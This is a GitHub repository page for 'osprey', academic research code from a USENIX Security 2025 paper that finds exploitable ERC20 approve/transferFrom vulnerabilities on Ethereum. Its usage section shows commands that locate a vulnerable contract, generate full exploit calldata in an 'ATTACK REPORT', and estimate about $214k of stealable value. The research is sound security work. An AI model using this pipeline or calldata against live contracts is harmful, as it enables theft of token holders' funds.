Skip to content

ucsb-seclab/osprey

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.github/images
.github/images
 
 
data
data
 
 
osprey
osprey
 
 
scripts
scripts
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
config.env
config.env
 
 
mainnet.sql
mainnet.sql
 
 
setup.py
setup.py
 
 

Repository files navigation

Approve Once, Regret Forever: On the Exploitation of Ethereum’s ERC20 Approve-TransferFrom Ecosystem

ubuntu python

This repository contains the code used for our USENIX Security 2025 paper Approve Once, Regret Forever: On the Exploitation of Ethereum’s ERC20 Approve-TransferFrom Ecosystem. Our system, osprey, can be used to find exploitable Approved-Controllable-TransferFrom (ACT) vulnerabilities on the Ethereum blockchain.

⚠️ Disclaimer

For ethical reasons, we are not releasing a fully automated "push-one-button" solution for the identification and automatic exploitation of vulnerable smart contracts. We instead open-source all the necessary scripts to demonstrate the approach presented in our paper. Interested researchers will have all the necessary code to replicate our work. In case something does not click, please reach out to us :)

Dependencies

To run osprey, you will need:

  • To install greed -- our symbolic execution engine for EVM smart contract binaries.
  • For some of the analyses, you will need access to an Ethereum (archive) node (e.g., go-ethereum, erigon).
  • For some of the analyses, you will need a database of historical (internal) transactions. We maintain our own (private) database, but you can also use other existing serivces (e.g., ether-sql).

Usage

# you can run the individual analyses in osprey with:

export ERC=ERC20
export BLOCK_NUMBER=17478994

./do_find_transferfrom.py /data/blockchain/contracts_data/d122e491fcae5428cc30bfee93216a93b633ccd87f02adcb7add763f509affbc 0x2575 0x0031b016
# > CONTROLLABLE TRANSFERFROM REPORT: {"codehash": "0xd122e491fcae5428cc30bfee93216a93b633ccd87f02adcb7add763f509affbc", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "call_pc": "0x2575", "four_bytes": "0031b016"}

./do_call_transferfrom.py '{"codehash": "0xd122e491fcae5428cc30bfee93216a93b633ccd87f02adcb7add763f509affbc", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "call_pc": "0x2575", "four_bytes": "0031b016"}'
# > ATTACK REPORT (uncertainty=0): {"block": 17478994, "proxy_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "evm_call_pc": "0x2575", "caller": "0x4040404040404040404141404040404040404040", "callvalue": 0, "target": "0x4141414141414141414242414141414141414141", "token": "0x4141414141414141414242414141414141414141", "arg_from": "0x4242424242424242424343424242424242424242", "arg_to": "0x7F56230B3823d1a0968C3ceB3D00BA5E2271CE14", "arg_value_expected": 68, "arg_tokenid_expected": null, "calldata": "0031b01600000000000000000000000000000000000000000000000000000000000001044040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040400000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007f56230b3823d1a0968c3ceb3d00ba5e2271ce1400000000000000000000000000000000000000000000000000000000000000000000000000000000000000004242424242424242424343424242424242424242000000000000000000000000414141414141414141424241414141414141414100000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002004040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000", "oracle_returndata": ["0000000000000000000000000000000000000000000000000000000000000001"]}

./do_measure_attack_impact.py '{"block": 17478994, "proxy_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "storage_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "code_address": "0x79cdFd7Bc46D577b95ed92bcdc8abAba1844Af0c", "evm_call_pc": "0x2575", "caller": "0x4040404040404040404141404040404040404040", "callvalue": 0, "target": "0x4141414141414141414242414141414141414141", "token": "0x4141414141414141414242414141414141414141", "arg_from": "0x4242424242424242424343424242424242424242", "arg_to": "0x7F56230B3823d1a0968C3ceB3D00BA5E2271CE14", "arg_value_expected": 68, "arg_tokenid_expected": null, "calldata": "0031b01600000000000000000000000000000000000000000000000000000000000001044040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040400000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007f56230b3823d1a0968c3ceb3d00ba5e2271ce1400000000000000000000000000000000000000000000000000000000000000000000000000000000000000004242424242424242424343424242424242424242000000000000000000000000414141414141414141424241414141414141414100000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002004040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404040404000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000", "oracle_returndata": ["0000000000000000000000000000000000000000000000000000000000000001"]}'
# > Found 70 meaningful attack tuples after pricing. Total impact: $214161.31

About

No description, website, or topics provided.

Resources

Readme
Activity
Custom properties

Stars

6 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages